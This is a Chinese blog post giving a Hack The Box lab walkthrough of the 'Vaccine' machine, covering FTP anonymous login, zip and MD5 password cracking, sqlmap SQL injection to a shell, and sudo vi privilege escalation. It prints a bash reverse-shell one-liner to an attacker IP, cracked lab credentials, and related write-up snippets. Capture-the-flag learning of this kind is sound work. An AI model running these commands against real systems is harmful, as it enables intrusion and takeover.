[渗透测试]HTB-Vaccine

最新推荐文章于 2024-09-16 23:17:14 发布
最新推荐文章于 2024-09-16 23:17:14 发布
阅读量1.1k 收藏
点赞数
分类专栏: 网络安全 文章标签: 安全 网络安全 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_47224111/article/details/121376661
版权

0x01 信息收集

nmap -sC -sV 10.129.41.14
发现21 ftp
22 ssh
80 web 端口开放
在这里插入图片描述
其中21端口允许anonymous匿名登录

0x02对22端口测试

ftp 10.129.41.14
anonymous
发现存在一个back.zip 文件
解压发现存在密码
在这里插入图片描述
使用zip2john backup.zip > hashes
将backup.zip 的哈希导出
在这里插入图片描述
john -wordlist=/usr/share/wordlists/rockyou.txt hashes

John 爆破只会显示第一次的结果
如果要显示之前的结果
john hashes --show
在这里插入图片描述
这里密码是741852963
解压后里面是index.php
在这里插入图片描述
md5 解码后密码是 qwerty789

0x03 对80端口进行测试

访问80端口,登录之后有一个搜索框。
在这里插入图片描述
插入一个’ 报错 应该是存在注入
用sqlmap跑一下
sqlmap -u 10.129.41.14/dashboard.php --cookie
得带上cookie 不然跑不了

在这里插入图片描述
获取到一个webshell

bash -c 'bash -i >& /dev/tcp/10.10.14.90/1234 0>&1'

kali上开启nc监听 获得一个反弹shell

在/var/www/html/dashboard.php 下发现
postgres的账号密码

在这里插入图片描述

尝试ssh登录
在这里插入图片描述
在这里插入图片描述
sudo -l 查看

发现此用户 /bin/vi 处理/etc/postgresql/11/main/pg_hba.conf 具有root权限
在这里插入图片描述
在GTFO上搜一下操作
在这里插入图片描述
获得root权限

在这里插入图片描述

0x04 总结

nmap扫描 发现开启22 21 80
21匿名登录 john 爆破backup 文件
得到网页登录密码 后台存在注入 --os-shell 成功获取 webshell
转成反弹shell 在网站下找到 ssh 密码
登录ssh sudo -l 查看可以提权的点
在gtfobin上看见提权的操作
获得root权限

hedianshui888
关注
专栏目录
渗透测试练习靶场hackthebox——Starting Point Vaccine攻略(内附各种bug解决方案)
TF0xn的博客
09-22 2021
目录连接配置扫描登录FTP破解压缩包密码登录网站SQL注入getshell(附bug解决办法)升级shell提权 连接配置 见这篇文章开始部分,在此不再赘述 扫描 根据给出的IP地址,使用nmap进行扫描 nmap -T4 -F 10.10.10.28 -T4:针对TCP端口禁止动态扫描延迟超过10ms -F:快速扫描,扫描一些常用端口 发现其开放了21、22和80端口,接下来我们用上一节最后部分获取到的ftp用户凭据ftpuser/mc@F1l3ZilL4登录ftp服务 登录FTP ftp 10.10
[渗透测试]HTB-Oopsie
weixin_47224111的博客
11-15 1295
0x01 信息收集 nmap扫描 发现80端口 和22端口
[渗透测试]HTB靶机-Vaccine
Y4tacker的博客
07-22 765
文章目录Vaccine Vaccine 首先nmap -sC -sV 10.10.10.46 发现前台是一个登陆界面,尝试ftp登录ftpuser / mc@F1l3ZilL4 输入dir拿到源码 尝试下载 通过爆破得到密码741852963 拿到源码 拿到2cb42f8734ea607eefed3b70af13bbd3去尝试md5撞库 成功进入后台 发现存在sql注入 这里很容易猜测到如果是只通过sql那一定是通过udf提权,直接sqlmap一把梭 输入bash -c 'bash -
# HTB-Tier2- Vaccine
32bin的博客
11-18 1092
WebNetworkVulnerability AssessmentDatabasesInjectionCustom ApplicationsProtocolsSource Code AnalysisApachePostgreSQLFTPPHPPenetration Tester Level 1ReconaisancePassword CrackingSUDO ExploitationSQL InjectionRemote Code ExecutionClear Text CredentialsAnonym
HTB_Vaccine之通过root权限的vi提权
网络安全学习
08-30 1236
zip解密 sqlmap获取os-shell root vi提权
kube-flannel.yml 保存
qq120631157的博客
07-28 598
apiVersion: policy/v1beta1 kind: PodSecurityPolicy metadata: name: psp.flannel.unprivileged annotations: seccomp.security.alpha.kubernetes.io/allowedProfileNames: docker/default seccomp.security.alpha.kubernetes.io/defaultProfileName: docker/default appar.
qos-htb-开源
05-03
qos-htb是您一直在等待的简单带宽管理解决方案,graphix制作了图表,您可以在一秒钟之内查看到底谁在消耗带宽!
htb-beep
m0_55772907的博客
09-15 953
一般
xml-HTB-开源
05-02
xml-HTB是用于自动生成bash脚本的工具,该工具可在Linux上设置HTB。 它使用xml配置文件。 它易于使用,具有许多功能:多种深度的类,可配置的叶子,u32和fw过滤器,可同时配置两个输入
HTB-Recon:Hackthebox计算机的自动侦查脚本(hackthebox.eu)
03-09
例如: ./htb-recon.sh 10.10.10.10. ServMon Windows ./htb-recon.sh 10.10.10.10. ServMon Windows 然后通过tmux a -t htb_recon附加会话 它能做什么 在您的主目录中创建一个工作区。 创建不同的文件夹以使事情...
Android 系统(251)---sec2.0和sec2.1新增分区DA客制化步骤
zhangbijun1230的专栏
08-03 1272
sec2.0和sec2.1新增分区DA客制化步骤        在sec2.0和sec2.1中,如果客户新增分区超过两个,又不想用DA中默认的sec policy,可以按如下方法进行配置。   以MT6739为例,增加第三个分区,分区名为“customer”:  1.修改sec_policy_config_common.h,包括如下路径:  \Customization_Kit_bui...
时间&安全精细化管理平台存在未授权访问漏洞
2301_77012231的博客
09-14 305
登录--时间&安全精细化管理平台存在未授权访问漏洞导致与员工信息泄露。
SSHamble:一款针对SSH技术安全的研究与分析工具
FreeBuf_的博客
09-11 1176
SSHamble是一款功能强大的SSH技术安全分析与研究工具,该工具基于Go语言开发,可以帮助广大研究人员更好地分析SSH相关的安全技术与缺陷问题。
【农信网-注册/登录安全分析报告】
最新发布
09-16 893
北京农信互联科技集团有限公司是一家农业互联网高科技企业,以“用互联网改变农业”为使命,致力于构建最有影响力的农业数智生态平台,推动中国农业数字化转型升级。作为农业互联网领域的“独角兽”企业, 技术实力也应该不错,但采用的还是老一代的图形验证码已经落伍了, 用户体验一般,容易被破解, 一旦被国际黑客发起攻击,将会对老百姓形成骚扰,影响声誉。很多人在短信服务刚开始建设的阶段,可能不会在安全方面考虑太多,理由有很多。比如:“需求这么赶,当然是先实现功能啊”,“业务量很小啦,系统就这么点人用,不怕的。
【免费刷题】实验室安全第一知识题库分享
nulixueBe的博客
09-13 483
人工智能识别上海985大学的实验室安全知识手册,生成题库,直接刷题
3286、穿越网格图的安全路径
Lenyiin
09-16 470
这个问题可以通过图的最短路径算法来解决。我们需要使用一个动态规划 (DP) 方法来记录从起点到每个位置所需的最小健康值。在这个问题中,我们可以将 DP 结合 DFS 来实现。这个解法结合了 DFS 和动态规划,通过在矩阵中维护最小健康值来确保从起点到终点的路径在健康值条件下是可行的。你可以在矩形中往上下左右相邻格子移动,但前提是你的健康值始终是。的,会使你的健康值减少 1。如果你可以到达最终的格子,请你返回。,当你在最终格子的时候,你的健康值也必须为。你开始于矩形的左上角。,你的目标是矩形的右下角。
远程跨境传输大文件如何做到安全又稳定?
镭速的博客
09-14 606
在当今全球化的商业环境中,企业跨境传输大文件的需求日益增长。这不仅涉及到数据的快速迁移,还包括了安全性、稳定性和合规性等多重挑战。本文将探讨企业在跨境传输大文件时可能遇到的问题,以及在传输过程中应注意的事项,并重点介绍镭速在方面的优势。
GORM安全-保护你的应用免受SQL注入攻击
一起coding,一起嗨。
09-12 629
GORM安全-保护你的应用免受SQL注入攻击
【API安全】威胁猎人发布超大流量解决方案
weixin_41829439的博客
09-11 1131
威胁猎人超大流量场景API安全解决方案助力合作客户实时发现API风险
HTB攻防记:Stocker,子域探索与XSS利用
该环境主要涉及web安全Linux系统、JavaScript(JS)以及网络安全渗透测试技能的实践。首先,通过使用Nmap工具进行网络探测,攻击者定位了目标IP地址10.129.51.243,并将其添加到hosts文件中以便更方便地访问。 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值